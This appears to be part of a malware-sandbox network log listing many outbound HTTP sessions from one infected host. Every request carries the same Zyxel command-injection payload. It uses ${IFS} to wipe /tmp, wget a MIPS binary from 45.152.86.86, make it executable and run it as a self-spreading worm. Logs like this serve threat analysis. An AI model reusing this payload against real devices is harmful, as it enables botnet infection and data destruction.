                                        Mar 31, 2024 09:21:44.133115053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5532192.168.2.2354364150.166.70.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133157969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5533192.168.2.2351198180.37.181.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133270025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5534192.168.2.235814062.205.197.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133301020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5535192.168.2.234437474.50.94.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133341074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5536192.168.2.234046067.103.162.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133399010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5537192.168.2.2353430138.237.225.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133430958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5538192.168.2.235314018.102.21.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133466959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5539192.168.2.233988447.123.72.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133524895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5540192.168.2.234930683.136.161.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133563042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5541192.168.2.233370092.119.140.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133615017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5542192.168.2.234588481.204.20.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133671999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5543192.168.2.2336604165.69.220.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133703947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5544192.168.2.2346100138.23.245.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133759975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5545192.168.2.2342370130.91.239.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133795023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5546192.168.2.2353204134.63.87.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133835077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5547192.168.2.2354588198.233.228.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133894920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5548192.168.2.2349892159.28.34.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133930922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5549192.168.2.2349922124.137.110.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133986950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5550192.168.2.234586099.243.72.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134044886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5551192.168.2.2349104175.207.150.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134087086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5552192.168.2.234628231.20.24.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134135008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5553192.168.2.235688078.140.8.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134186029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5554192.168.2.234762217.114.163.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134217024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5555192.168.2.2347876204.101.85.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134253025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5556192.168.2.2358548190.15.4.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134309053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5557192.168.2.233937890.104.247.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134382963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5558192.168.2.233747817.93.246.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134433031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5559192.168.2.234112212.225.61.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134501934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5560192.168.2.2345420146.104.10.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134540081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5561192.168.2.235816448.29.230.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134596109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5562192.168.2.2355138119.247.70.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134641886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5563192.168.2.2337364148.56.4.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134700060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5564192.168.2.2360456172.211.147.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134751081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5565192.168.2.234552847.162.61.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134819031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5566192.168.2.235731479.7.237.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134859085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5567192.168.2.2350708163.108.43.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134901047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5568192.168.2.235775242.34.189.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134958029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5569192.168.2.233808058.42.10.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.134987116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5570192.168.2.2334402123.20.103.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135054111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5571192.168.2.234122242.208.76.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135101080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5572192.168.2.2341628150.249.110.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135133982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5573192.168.2.2355336140.215.209.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135169983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5574192.168.2.2346262139.193.226.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135226965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5575192.168.2.233922446.131.174.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135279894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5576192.168.2.2335454177.18.132.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135317087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5577192.168.2.2339592114.66.125.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135371923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5578192.168.2.2350426132.195.77.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135431051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5579192.168.2.2338114221.253.98.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135473967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5580192.168.2.235177266.182.176.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135534048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5581192.168.2.235877493.209.241.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135596037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5582192.168.2.2354532163.187.67.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135643005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5583192.168.2.234983685.42.49.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135689974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5584192.168.2.235926841.12.55.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135742903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5585192.168.2.2350010130.69.199.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135791063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5586192.168.2.234162092.209.9.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135821104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5587192.168.2.234650054.74.102.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135914087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5588192.168.2.235082049.175.66.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.135951042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5589192.168.2.2335474168.190.137.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136003017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5590192.168.2.2338438113.185.62.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136044979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5591192.168.2.2335458117.176.99.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136097908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5592192.168.2.2352720122.32.9.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136140108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5593192.168.2.2337346195.239.49.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136192083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5594192.168.2.2351888102.2.75.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136245966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5595192.168.2.235155477.184.121.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136296988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5596192.168.2.235269270.71.136.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136332035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5597192.168.2.2343866106.48.33.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136373997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5598192.168.2.233346471.163.206.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136440992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5599192.168.2.234611476.198.95.104443
                                        TimestampBytes transferredDirectionData
